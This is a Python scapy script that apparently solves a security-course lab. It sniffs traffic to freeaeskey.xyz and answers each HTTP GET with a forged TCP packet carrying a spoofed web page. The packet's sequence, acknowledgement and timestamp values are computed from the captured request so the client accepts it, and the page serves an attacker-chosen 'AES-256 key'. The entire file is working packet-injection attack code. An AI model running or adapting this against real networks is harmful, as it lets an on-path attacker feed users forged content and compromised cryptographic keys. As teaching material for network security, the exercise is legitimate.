#!/usr/bin/python3

import scapy
from scapy.all import *



def inject_pkt(pkt):
    print('Request made: Responding')
    # Modify packet from base
    # Send to inject_pkt

    np=Ether()/IP()/TCP()/Raw()     # New packet object

    # Ethernet
    np[Ether].src=pkt[Ether].dst
    np[Ether].dst=pkt[Ether].src

    # IP
    np[IP].src=pkt[IP].dst
    np[IP].dst=pkt[IP].src
    np[IP].ttl=37
    np[IP].flags='DF'
    np[IP].frag=0
    np.ihl=5
    np[IP].tos=0x0

    #TCP
    np[TCP].sport=pkt[TCP].dport
    np[TCP].dport=pkt[TCP].sport
    np[TCP].dataofs=8
    np[TCP].reserved=0
    np[TCP].urgptr=0
    
    np[TCP].options=[('NOP', None), ('NOP', None), ('Timestamp', (pkt[TCP].options[2][1][1]+200, pkt[TCP].options[2][1][0]))]   # Set timestamp config with .2s increase assumption

    np[TCP].seq=pkt[TCP].ack                        # Set seq
    np[TCP].ack=pkt[TCP].seq+len(pkt[Raw].load)     # Set acknowledge using packet length

    np[TCP].flags='PA'

    # Inject our own HTML
    np[Raw].load='HTTP/1.1 200 OK\r\nServer: nginx/1.14.0 (Ubuntu)\r\nDate: Tue, 07 Apr 2020 00:06:41 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 335\r\nConnection: close\r\n\r\n<html>\n<head>\n  <title>Free AES Key Generator!</title>\n</head>\n<body>\n<h1 style="margin-bottom: 0px">Free AES Key Generator!</h1>\n<span style="font-size: 5%">Definitely not run by the NSA.</span><br/>\n<br/>\n<br/>\nYour <i>free</i> AES-256 key: <b>4d6167696320576f7264733a2053717565616d697368204f7373696672616765</b><br/>\n</body>\n</html>'
    
    # Send packet out
    sendp(np)
    


def handle_pkt(pkt):
    if str(pkt).find('GET / HTTP/1.1')>=0:    # Respond if get request
        inject_pkt(pkt)
    pass


def main():
    conf.L3socket=L3RawSocket
    conf.use_pcap=True
    pkts = sniff(filter='host freeaeskey.xyz',prn=handle_pkt, store=False)  # Sniff packets requesting data from target website




if __name__ == '__main__':
    main()
